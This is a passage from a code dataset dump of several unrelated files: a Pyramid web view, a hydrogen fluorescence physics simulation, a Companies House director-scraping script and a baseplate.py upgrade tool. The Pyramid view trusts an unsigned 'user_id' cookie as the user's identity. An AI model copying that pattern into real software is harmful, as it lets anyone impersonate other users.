{"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 38, "usage_type": "attribute"}]} +{"seq_id": "503737512", "text": "from pyramid.view import view_config\nfrom swoll.models.user import User\nfrom pyramid.httpexceptions import HTTPFound\n\n\n@view_config(route_name='home', renderer='home.jinja2')\ndef home(request):\n user_id = request.cookies.get(\"user_id\")\n if user_id is not None:\n games = []\n user = User.lookup(int(user_id))\n for player in user.players:\n match = player.board.match\n games.append({\n \"board_id\": player.board_id,\n \"team_away\": match.team_away.name,\n \"team_home\": match.team_home.name\n })\n return {\n 'matches': games\n }\n else:\n return HTTPFound(location=\"/login/\")\n", "sub_path": "swoll/views/home.py", "file_name": "home.py", "file_ext": "py", "file_size_in_byte": 701, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "swoll.models.user.User.lookup", "line_number": 11, "usage_type": "call"}, {"api_name": "swoll.models.user.User", "line_number": 11, "usage_type": "name"}, {"api_name": "pyramid.httpexceptions.HTTPFound", "line_number": 23, "usage_type": "call"}, {"api_name": "pyramid.view.view_config", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "225110069", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 22 10:27:38 2017\r\n@author: Simon\r\n\"\"\"\r\n\r\nfrom __future__ import division\r\nimport numpy as np\r\nfrom bases_pivot_Gauss import *\r\nfrom matplotlib import pyplot as plt\r\nfrom scipy.integrate import quad\r\nfrom scipy.interpolate import interp1d\r\nfrom scipy.special import erf\r\nimport time\r\n\r\nN = len(LJmJmI())\r\n\r\n##### VALEURS NUMERIQUES #####\r\nmub = 1.3996245042 # magnéton de Bohr en MHz/G (CODATA14)\r\nme = 9.10938356e-31 # masse de l'électron en kg (CODATA14)\r\nmN = 1.672621898e-27 # masse du proton en kg (CODATA14)\r\nqe = 1.6021766208e-19 # charge de l'électron en C (CODATA14)\r\na0 = 0.52917721067e-10 # rayon de Bohr en m (CODATA14)\r\nh = 6.626070040e-34 # constante de Planck en J.s (CODATA14)\r\ngN = 5.585694702 # facteur de Landé du noyau (CODATA14)\r\nge = 2.00231930436182 # facteur de Landé de l'électron (CODATA14)\r\nc = 299792458 # vitesse de la lumière dans le vide en m/s\r\nalpha = 7.2973525664e-3 # constante de structure fine (CODATA14)\r\n# Lamb shift en MHz (n,L) (Galtier thèse) :\r\nLS = {(1,0):8172.840, (3,0):311.404, (3,1):0}\r\n# Constante de couplage en MHz (n) :\r\nA_SHF = {1:1420.405751768, 3:52.6094446}\r\n# Facteur de Landé de l'électron (n) (Indelicato)\r\ngS = {1:2.00228377, 3:2.0023152}\r\n# Largeur des niveaux en MHz (n,L) :\r\ngamma = {(1,0):0, (3,0):1.004945452, (3,1):30.192}\r\n \r\n##### HAMILTONIENS #####\r\ndef H_SFHF(E0=0): # en MHz (Hagel thèse, Brodsky67, Glass thèse) \r\n # base = 'LJFmF' \r\n H = np.zeros((N,N))\r\n for n, niv1 in enumerate(LJFmF()):\r\n for m, niv2 in enumerate(LJFmF()):\r\n if n == m: # (I·J)\r\n H[n,m] = E(niv1.n, niv1.L, niv1.J) - E0 \\\r\n + (3/16)*A_SHF[niv1.n] \\\r\n *(niv1.F*(niv1.F+1)-niv1.J*(niv1.J+1)-niv1.I*(niv1.I+1)) \\\r\n /(niv1.J*(niv1.J+1)*(niv1.L+1/2))\r\n if niv1.L != 0 and niv1.J != niv2.J \\\r\n and niv1.L==niv2.L and niv1.F==niv2.F and niv1.mF==niv2.mF: # (I·L)\r\n H[n,m] = (3/16)*A_SHF[3] \\\r\n *(-1)**(2*niv1.J+niv1.L+niv1.F+niv1.I+3/2) \\\r\n *np.sqrt((2*niv1.J+1)*(2*niv2.J+1) \\\r\n *(2*niv1.I+1)*(niv1.I+1)*niv1.I \\\r\n *(2*niv1.L+1)*(niv1.L+1)*niv1.L) \\\r\n *wigner6j(niv1.F,niv1.I,niv2.J,1,niv1.J,niv1.I) \\\r\n *wigner6j(niv1.L,niv2.J,1/2,niv1.J,niv1.L,1) \\\r\n /(niv1.L*(niv1.L+1)*(niv1.L+1/2))\r\n return H \r\n \r\ndef E(n,L,J): # Dirac + recul + Lamb Shift, pour Z=1, en MHz\r\n mu = me*mN/(me+mN)\r\n epsilon = J + 1/2 - np.sqrt((J+1/2)**2-alpha**2)\r\n E = (mu*c**2)*(1/np.sqrt(1+(alpha/(n-epsilon))**2) - 1)\r\n E -= (mu**2*c**2)*alpha**4 / ((me+mN)*8*n**4)\r\n E *= 1e-6/h # conversion en MHz\r\n E += LS[(n,L)]\r\n return E\r\n \r\ndef H_Zeeman(B): # en MHz (Hagel thèse, Glass thèse)\r\n # base = 'LmSmLmI'\r\n H = np.zeros((N,N))\r\n for n, niv in enumerate(LmSmLmI()):\r\n H[n,n] = (gS[niv.n]*niv.mS + (1-me/mN)*niv.mL - gN*me/mN*niv.mI)*mub*B\r\n H[n,n] -= diamagnetique(niv.n,niv.L,niv.mL)*B**2\r\n return H\r\n \r\ndef diamagnetique(n,L,mL): # en MHz/G² (Delande thèse)\r\n r_perp_2 = n**2*(5*n**2+1-3*L*(L+1))*(L**2+L-1+mL**2)/((2*L-1)*(2*L+3))\r\n return r_perp_2 * qe**2*a0**2/(8*me*h) * 1e-14 # Hz/T² -> MHz/G²\r\n\r\ndef H_Stark(B): # en MHz/(km/s) (Hagel thèse, Glass thèse)\r\n #base = 'LJmJmI'\r\n H = np.zeros((N,N))\r\n for n, niv1 in enumerate(LJmJmI()):\r\n for m, niv2 in enumerate(LJmJmI()):\r\n if niv1.mI != niv2.mI:\r\n H[n,m] = 0\r\n else:\r\n H[n,m] = R(niv1.n, niv1.L, niv2.n, niv2.L) \\\r\n *A(niv1.L,niv1.I,niv1.J,niv1.mJ,\r\n niv2.L,niv2.I,niv2.J,niv2.mJ) \\\r\n *a0*qe*B/h * 1e-7 # Hz/(T*m/s) -> MHz/(G*km/s)\r\n return H\r\n \r\ndef A(L1,I1,J1,mJ1,L2,I2,J2,mJ2):\r\n # Polarisation du champ motionnel normale à l'axe de quantification\r\n k, S = 1, 1/2 # ordre, spin\r\n return np.sum([-q*np.sin(np.pi/2)/np.sqrt(2) \\\r\n * (-1)**(S+mJ1) \\\r\n * np.sqrt((2*J1+1)*(2*J2+1)*(2*L1+1)*(2*L2+1)) \\\r\n * wigner6j(J1,k,J2,L2,S,L1) \\\r\n * wigner3j(J1,k,J2,-mJ1,q,mJ2) \\\r\n * wigner3j(L1,k,L2,0,0,0) for q in [-1,1]]) # q = delta_mI = +-1\r\n \r\ndef R(n1,L1,n2,L2):\r\n if n1==n2 and np.abs(L1-L2)==1:\r\n return 3/2*n1*np.sqrt(n1**2-max(L1,L2)**2)\r\n else:\r\n return 0\r\n\r\ndef H_2photons(rabi):\r\n H = np.zeros((N,N),dtype=complex) \r\n for i,a in enumerate(LJmJmI()):\r\n for j,d in enumerate(LJmJmI()):\r\n if a.n!=d.n and a.L==d.L and a.mJ==d.mJ and a.mI==d.mI:\r\n H[i,j] = rabi\r\n return H\r\n \r\ndef convert(H,P):\r\n return np.dot(P,np.dot(H,P.transpose()))\r\n\r\n##### POPULATIONS ET FLUORESCENCE #####\r\ndef matrice_densite(f=0,B=180,v=3,rabi=0.01):\r\n H = np.zeros((N,N),dtype=complex)\r\n H += convert(H_SFHF(),LJF_vers_LJI()) \\\r\n + convert(H_Zeeman(B),LSI_vers_LJI()) \\\r\n + H_Stark(B)*v \\\r\n + H_2photons(rabi)\r\n \r\n for i,u in enumerate(LJFmF()):\r\n if getattr(u,'n')==1 and getattr(u,'mF')==1:\r\n E1S = H_SFHF()[i,i]\r\n if getattr(u,'n')==3 and getattr(u,'L')==0 and getattr(u,'mF')==1:\r\n E3S = H_SFHF()[i,i]\r\n f += (E3S - E1S)*(1 + (v*1E3)**2/(2*c**2)) # avec v en km/s\r\n\r\n C = np.zeros((N,N),dtype=complex)\r\n for i,a in enumerate(LJmJmI()):\r\n for j,d in enumerate(LJmJmI()):\r\n C[i,j] = -1j/(4*np.pi)*(gamma[(a.n,a.L)] + gamma[(d.n,d.L)])\r\n if a.n==1 and d.n==3:\r\n C[i,j] += f\r\n if a.n==3 and d.n==1:\r\n C[i,j] -= f\r\n \r\n A = np.zeros((N**2,N**2),dtype=complex)\r\n B = np.zeros(N**2,dtype=complex) \r\n k = 0\r\n for i in range(N):\r\n for j in range(N):\r\n A_ij = np.zeros((N,N),dtype=complex)\r\n A_ij[:,j] = H[i,:].transpose()\r\n A_ij[i,:] -= H[:,j].transpose()\r\n A_ij[i,j] += C[i,j]\r\n A[k,:] = A_ij.reshape((1,N**2))\r\n k += 1\r\n for i in range(4): # si les niveaux 1S sont les 4 premiers de la base\r\n B[i*(N+1)] += -1j\r\n\r\n X = np.linalg.solve(A,B)\r\n return X.reshape((N,N))\r\n\r\ndef coefv(v,sigma,vo): #(Olander70, Arnoult thèse, Galtier thèse)\r\n xd = 6.5e-6 # taille de la zone de détection/2 en km\r\n zr = 35e-6 # longueur de Rayleigh en km\r\n taue = 1e-6/(2*np.pi) # durée de vie en s \r\n z = v/(np.sqrt(2)*sigma)\r\n psi = (z*np.exp(-z**2)+np.sqrt(np.pi)/2.*(1+2*z**2)*erf(z)) \\\r\n /(np.sqrt(2*np.pi)*z**2)\r\n K = 0.01\r\n maxwell = 4./np.sqrt(np.pi)*z**2*np.exp(-z**2)\r\n olander = np.sqrt(np.pi)/2.*np.sqrt(erf(psi/(2*K)))/np.sqrt(psi/(2*K))\r\n olivier = np.arctan((xd-v*taue)/zr)+np.arctan((xd+v*taue)/zr)\r\n return maxwell*olander*olivier*np.exp(-vo/v)\r\n\r\n#def forme_de_raie(B,sigma,v0):\r\n# debut = time.time()\r\n# frequences = np.linspace(-5,5,1001) # en MHz\r\n# vitesses = np.linspace(0.1,10.1,101) # en km/s (v non nul pour coefv)\r\n# normalisation = quad(lambda x:coefv(x,sigma,vo),0.1,10.1)[0] \r\n# fluo = np.zeros(len(frequences))\r\n# fluo_v = np.zeros(len(vitesses))\r\n# for i,delta in enumerate(frequences):\r\n# for j,v in enumerate(vitesses):\r\n# w = 'delta E 1S-3S avec LS' + v**2*nu0/(2*c**2)\r\n# pop = np.diag(matrice_densite(w,B,v))[4:,4:]\r\n# fluo_v[j] = gamma[(3,0)]*np.sum(pop[:4]) \\\r\n# + branch_3P*gamma[(3,1)]*np.sum(pop[4:]) \\\r\n# * coefv(v,sigma,v0)\r\n# fluo[i] = quad(interp1d(vitesses,fluo_v[:,k],kind='cubic'),0.1,10.1)[0]\r\n# fluo[i] *= 1/normalisation\r\n# print 'Calcul fini pour B =',B,', sigma =',sigma,', v0 =',vo, \\\r\n# ', en ',int(time.time()-debut),' s'\r\n# return frequences,fluo*1000", "sub_path": "fluo3S_H_juin17_II.py", "file_name": "fluo3S_H_juin17_II.py", "file_ext": "py", "file_size_in_byte": 8022, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.zeros", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 99, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 141, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.linalg.solve", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 161, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 167, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 169, "usage_type": "attribute"}, {"api_name": "scipy.special.erf", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 170, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 172, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 173, "usage_type": "attribute"}, {"api_name": "scipy.special.erf", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.arctan", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "506795433", "text": "#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport os\nimport csv\nimport sys\nimport json\nimport datetime\nimport argparse\nfrom time import sleep\nfrom requests import HTTPError\n\nfrom companies_house.api import CompaniesHouseAPI\n\n_NUM_SC_PREF = \"SC\"\n_LAST_FILE_DEFAULT = 'last.json.sample.sample'\n_RESULT_CSV_DEFAULT = \"result.csv\"\n_API_KEY = os.getenv('API_KEY')\n\n\n# ------------------------------------------------------------------------------\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-l\", \"--last\", action='store', dest='last_file',\n help=\"last file path\", default=_LAST_FILE_DEFAULT)\n parser.add_argument(\"-o\", \"--out\", action='store', dest='result_file',\n help=\"Where result will be stored\", default=_RESULT_CSV_DEFAULT)\n parser.add_argument(\"-r\", \"--ratelimit-freeze\", action='store', dest='ratelimit',\n help=\"Where result will be stored\", default=50)\n parser.add_argument(\"-e\", \"--empty-limit\", action='store', dest='empty_limit',\n help=\"How much empty companies threat as end of list\", default=20)\n\n return parser.parse_args()\n\n\n# ------------------------------------------------------------------------------\n\ndef get_director(number: str, ch: CompaniesHouseAPI) -> str:\n director: str = \"\"\n psc = ch.list_company_officers(company_number=number)\n if not psc:\n psc = ch.list_company_persons_with_significant_control(company_number=number)\n if not psc:\n psc = ch.list_company_persons_with_significant_control_statements(company_number=number)\n if not psc:\n return None\n\n if psc.get(\"active_count\") == 1:\n officers = psc.get(\"items\")\n for officer in officers:\n if officer.get(\"officer_role\") == \"director\":\n director = officer.get(\"name\")\n return director\n\n\n# ------------------------------------------------------------------------------\n\n# noinspection PyPackageRequirements,PyPackageRequirements\ndef get_address(company: dict) -> tuple:\n registered_office_address = company.get(\"registered_office_address\")\n address = str(registered_office_address.get(\"address_line_1\"))\n country = str(registered_office_address.get(\"country\"))\n city = str(registered_office_address.get(\"locality\"))\n postal_code = str(registered_office_address.get(\"postal_code\"))\n\n return address, country, city, postal_code\n\n\n# ------------------------------------------------------------------------------\n\ndef get_company_details(number: str, ch: CompaniesHouseAPI) -> list:\n company: dict = {}\n res = None\n try:\n company = ch.get_company(company_number=number)\n except HTTPError as e:\n print(\"Companies House API returned error %sn \" % str(e)) # Sometimes companies house returns 502\n sleep(15) # we ill just wait 15 seconds and than retry\n company = ch.get_company(company_number=number)\n if not company:\n res = None\n if company: # checking for empty dict\n creation_date = datetime.datetime.strptime(company.get(\"date_of_creation\"), \"%Y-%m-%d\").date()\n time_delta = (datetime.datetime.now().date() - creation_date).days\n print(\"Company was registered \" + str(time_delta) + \" days ago\")\n if company.get(\"company_status\") == \"active\" and \"registered_office_address\" in company and company.get(\n 'type') == \"ltd\":\n director = get_director(number, ch)\n name = company[\"company_name\"]\n if director:\n\n address, country, city, postal_code = get_address(company)\n print(name)\n print(director)\n print(address)\n print(number)\n res = [[str(name).replace(',', ' '),\n str(director).replace(',', ' '),\n str(address).replace(',', ' '),\n str(country).replace(',', ' '),\n str(city).replace(',', ' '),\n str(postal_code).replace(',', ' ')]]\n return res\n else:\n res = -1\n print(str(number) + \" company does not exist or meet our requirements\")\n return res\n\n\n# ------------------------------------------------------------------------------\n\n\ndef main():\n args = get_args()\n ch = CompaniesHouseAPI(_API_KEY, int(args.ratelimit))\n _LAST_NUM_SC = 0\n _LAST_NUM_BR = 0\n empty_counter = 0\n empty_limit = int(args.empty_limit)\n with open(args.last_file, 'r+') as last_file:\n data = json.load(last_file)\n _LAST_NUM_BR = int(data[\"british_company_last_number\"])\n _LAST_NUM_SC = int(data[\"scottish_company_last_number\"])\n\n # British companies\n with open(args.result_file, \"a+\", newline='') as res:\n res.write(\"Company, Fullname, Address, Country, City, Postal Code\\n\")\n writer = csv.writer(res)\n while True:\n _LAST_NUM_BR += 1\n details = get_company_details(_LAST_NUM_BR, ch)\n print (details)\n if not details: # happens only if API returned http error or company doesn't meet our requirements\n continue\n if details == -1:\n print (\"Empty counter 1 \" + str(empty_counter))\n\n if empty_counter == empty_limit:\n _LAST_NUM_BR = _LAST_NUM_BR - 1\n print (\"Empty counter 2 \" + str(empty_counter))\n break\n else:\n empty_counter += 1\n continue\n empty_counter = 0\n writer.writerows(details)\n\n # Scottish companies\n empty_counter = 0\n while True:\n _LAST_NUM_SC += 1\n details = get_company_details(\"SC\" + str(_LAST_NUM_SC), ch)\n if not details:\n continue\n if details == -1:\n if empty_counter == empty_limit:\n _LAST_NUM_SC = _LAST_NUM_SC - 1\n break\n else:\n empty_counter += 1\n continue\n empty_counter = 0\n writer.writerows(details)\n data[\"british_company_last_number\"] = _LAST_NUM_BR - empty_limit # because we are checking 100 extra numbers\n data[\"scottish_company_last_number\"] = _LAST_NUM_SC - empty_limit\n last_file.seek(0)\n last_file.truncate()\n json.dump(data, last_file)\n exit(0)\n\n# ------------------------------------------------------------------------------\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6823, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 24, "usage_type": "call"}, {"api_name": "companies_house.api.CompaniesHouseAPI", "line_number": 39, "usage_type": "name"}, {"api_name": "companies_house.api.CompaniesHouseAPI", "line_number": 72, "usage_type": "name"}, {"api_name": "requests.HTTPError", "line_number": 77, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 84, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 85, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 85, "usage_type": "attribute"}, {"api_name": "companies_house.api.CompaniesHouseAPI", "line_number": 116, "usage_type": "call"}, {"api_name": "json.load", "line_number": 122, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 129, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 169, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 176, "usage_type": "call"}]} +{"seq_id": "555057515", "text": "import logging\nimport re\n\nfrom pathlib import Path\nfrom typing import Match\nfrom typing import Optional\n\nfrom ...python_version import PythonVersion\nfrom ...refactor import refactor_python_files\nfrom ...requirements import RequirementsFile\nfrom ...wheelhouse import Wheelhouse\n\n\nRENAMES = {\n \"baseplate._compat\": None,\n \"baseplate.config\": \"baseplate.lib.config\",\n \"baseplate.context\": \"baseplate.clients\",\n \"baseplate.core.AuthenticationToken\": \"baseplate.lib.edge_context.AuthenticationToken\",\n \"baseplate.core.AuthenticationTokenValidator\": \"baseplate.lib.edge_context.AuthenticationTokenValidator\",\n \"baseplate.core\": \"baseplate\",\n \"baseplate.core.EdgeRequestContext\": \"baseplate.lib.edge_context.EdgeRequestContext\",\n \"baseplate.core.EdgeRequestContextFactory\": \"baseplate.lib.edge_context.EdgeRequestContextFactory\",\n \"baseplate.core.InvalidAuthenticationToken\": \"baseplate.lib.edge_context.InvalidAuthenticationToken\",\n \"baseplate.core.NoAuthenticationError\": \"baseplate.lib.edge_context.NoAuthenticationError\",\n \"baseplate.core.OAuthClient\": \"baseplate.lib.edge_context.OAuthClient\",\n \"baseplate.core.Service\": \"baseplate.lib.edge_context.Service\",\n \"baseplate.core.Session\": \"baseplate.lib.edge_context.Session\",\n \"baseplate.core.User\": \"baseplate.lib.edge_context.User\",\n \"baseplate.core.ValidatedAuthenticationToken\": \"baseplate.lib.edge_context.ValidatedAuthenticationToken\",\n \"baseplate.crypto\": \"baseplate.lib.crypto\",\n \"baseplate.crypto.constant_time_compare\": \"hmac.compare_digest\",\n \"baseplate.datetime\": \"baseplate.lib.datetime\",\n \"baseplate.diagnostics\": \"baseplate.observers\",\n \"baseplate.diagnostics.tracing.publisher\": \"baseplate.sidecars.trace_publisher\",\n \"baseplate.error_reporter_from_config\": \"baseplate.observers.sentry.error_reporter_from_config\",\n \"baseplate.events\": \"baseplate.lib.events\",\n \"baseplate.events.publisher\": \"baseplate.sidecars.event_publisher\",\n \"baseplate.events.publisher.gzip_compress\": \"gzip.compress\",\n \"baseplate.events.publisher.V1Batch\": None,\n \"baseplate.events.queue\": \"baseplate.lib.events\",\n \"baseplate.events.queue.Event\": None,\n \"baseplate.events.queue.FieldKind\": None,\n \"baseplate.events.queue.serialize_v1_event\": None,\n \"baseplate.experiments\": \"baseplate.lib.experiments\",\n \"baseplate.file_watcher\": \"baseplate.lib.file_watcher\",\n \"baseplate.frameworks.wrapped_context\": None,\n \"baseplate.integration\": \"baseplate.frameworks\",\n \"baseplate.integration.pyramid.TRACE_HEADER_NAMES\": None,\n \"baseplate.integration.thrift._extract_trace_info\": None,\n \"baseplate.integration.thrift.TRACE_HEADER_NAMES\": None,\n \"baseplate.integration.thrift.RequestContext\": \"baseplate.RequestContext\",\n \"baseplate.live_data\": \"baseplate.lib.live_data\",\n \"baseplate.live_data.watcher\": \"baseplate.sidecars.live_data_watcher\",\n \"baseplate.message_queue\": \"baseplate.lib.message_queue\",\n \"baseplate.metrics\": \"baseplate.lib.metrics\",\n \"baseplate.metrics_client_from_config\": \"baseplate.lib.metrics.metrics_client_from_config\",\n \"baseplate.queue_consumer\": \"baseplate.frameworks.queue_consumer\",\n \"baseplate.queue_consumer.ConsumerContext\": \"baseplate.RequestContext\",\n \"baseplate.random\": \"baseplate.lib.random\",\n \"baseplate.ratelimit\": \"baseplate.lib.ratelimit\",\n \"baseplate.requests\": \"baseplate.lib._requests\",\n \"baseplate.retry\": \"baseplate.lib.retry\",\n \"baseplate.secrets\": \"baseplate.lib.secrets\",\n \"baseplate.secrets.fetcher\": \"baseplate.sidecars.secrets_fetcher\",\n \"baseplate.secrets.store\": \"baseplate.lib.secrets\",\n \"baseplate.service_discovery\": \"baseplate.lib.service_discovery\",\n \"baseplate.thrift_pool\": \"baseplate.lib.thrift_pool\",\n \"baseplate.tracing_client_from_config\": \"baseplate.observers.tracing.tracing_client_from_config\",\n \"baseplate._utils\": \"baseplate.lib\",\n \"baseplate._utils.Batch\": \"baseplate.sidecars.Batch\",\n \"baseplate._utils.BatchFull\": \"baseplate.sidecars.BatchFull\",\n \"baseplate._utils.RawJSONBatch\": \"baseplate.sidecars.RawJSONBatch\",\n \"baseplate._utils.SerializedBatch\": \"baseplate.sidecars.SerializedBatch\",\n \"baseplate._utils.TimeLimitedBatch\": \"baseplate.sidecars.TimeLimitedBatch\",\n}\n\n\nBASEPLATE_NAME_RE = re.compile(r\"(?Pbaseplate\\.(?:[A-Za-z_][A-Za-z0-9_]*\\.?)+)\")\n\n\nclass NameRemovedError(Exception):\n def __init__(self, name: str):\n super().__init__(\n f\"{repr(name)} does not exist anymore. Remove references to it.\"\n )\n\n\ndef get_new_name(name: str) -> Optional[str]:\n \"\"\"Find the most appropriate replacement for a name.\n\n This prefers longest (more-specific) matches over shorter ones. If the\n symbol does not need to be renamed, None is returned.\n\n \"\"\"\n for old, new in sorted(RENAMES.items(), key=lambda i: len(i[0]), reverse=True):\n if name == old or name.startswith(old + \".\"):\n if new is None:\n raise NameRemovedError(old)\n\n try:\n return name.replace(old, new, 1)\n except KeyError:\n return None\n return None\n\n\ndef replace_module_references(corpus: str) -> str:\n \"\"\"Replace references to modules in a body of text.\"\"\"\n\n def replace_name(m: Match[str]) -> str:\n old_name = m[\"name\"]\n try:\n new_name = get_new_name(old_name)\n except NameRemovedError:\n new_name = None\n return new_name or old_name\n\n return BASEPLATE_NAME_RE.sub(replace_name, corpus, re.MULTILINE)\n\n\ndef update(\n root: Path,\n python_version: Optional[PythonVersion],\n requirements_file: RequirementsFile,\n wheelhouse: Wheelhouse,\n) -> int:\n if python_version:\n if python_version < (3, 6):\n logging.error(\n \"Baseplate 1.0 requires Python 3.6+. Please upgrade Python first.\"\n )\n return 1\n else:\n logging.warning(\n \"Baseplate 1.0 requires Python 3.6+. Ensure Python is new enough.\"\n )\n\n refactor_python_files(root, __name__)\n\n wheelhouse.ensure(requirements_file, \"cassandra-driver>=3.13.0\")\n wheelhouse.ensure(requirements_file, \"cqlmapper>=0.2.0\")\n wheelhouse.ensure(requirements_file, \"gevent>=1.3\")\n wheelhouse.ensure(requirements_file, \"hvac>=0.2.17\")\n wheelhouse.ensure(requirements_file, \"kazoo>=2.5.0\")\n wheelhouse.ensure(requirements_file, \"kombu>=4.0.0\")\n wheelhouse.ensure(requirements_file, \"posix_ipc>=1.0.0\")\n wheelhouse.ensure(requirements_file, \"pyjwt>=1.6.0\")\n wheelhouse.ensure(requirements_file, \"pymemcache>=1.3.0,<=2.0.0\")\n wheelhouse.ensure(requirements_file, \"pyramid>=1.9.0\")\n wheelhouse.ensure(requirements_file, \"redis>=2.10.0,<=3.0.0\")\n wheelhouse.ensure(requirements_file, \"requests>=2.21.0\")\n wheelhouse.ensure(requirements_file, \"sqlalchemy>=1.1.0\")\n wheelhouse.ensure(requirements_file, \"thrift>=0.12.0\")\n\n for path in root.glob(\"**/*\"):\n if path.suffix in (\".ini\", \".txt\", \".md\", \".rst\"):\n try:\n old = path.read_text(\"utf8\")\n new = replace_module_references(old)\n if new != old:\n logging.info(\"Updated references in %s\", path)\n with path.open(\"w\", encoding=\"utf8\") as f:\n f.write(new)\n except OSError as exc:\n logging.warning(\"Can't fix references in %s: %s\", path, exc)\n\n return 0\n", "sub_path": "baseplate.py-upgrader/baseplate_py_upgrader/fixes/v1_0/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 7440, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "re.compile", "line_number": 78, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 88, "usage_type": "name"}, {"api_name": "typing.Match", "line_number": 110, "usage_type": "name"}, {"api_name": "re.MULTILINE", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 122, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 123, "usage_type": "name"}, {"api_name": "python_version.PythonVersion", "line_number": 123, "usage_type": "name"}, {"api_name": "requirements.RequirementsFile", "line_number": 124, "usage_type": "name"}, {"api_name": "wheelhouse.Wheelhouse", "line_number": 125, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 129, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 134, "usage_type": "call"}, {"api_name": "refactor.refactor_python_files", "line_number": 138, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 140, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 141, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 142, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 143, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 144, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 145, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 146, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 147, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 148, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 149, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 150, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 151, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 152, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 153, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 161, "usage_type": "call"}, {"api_name": 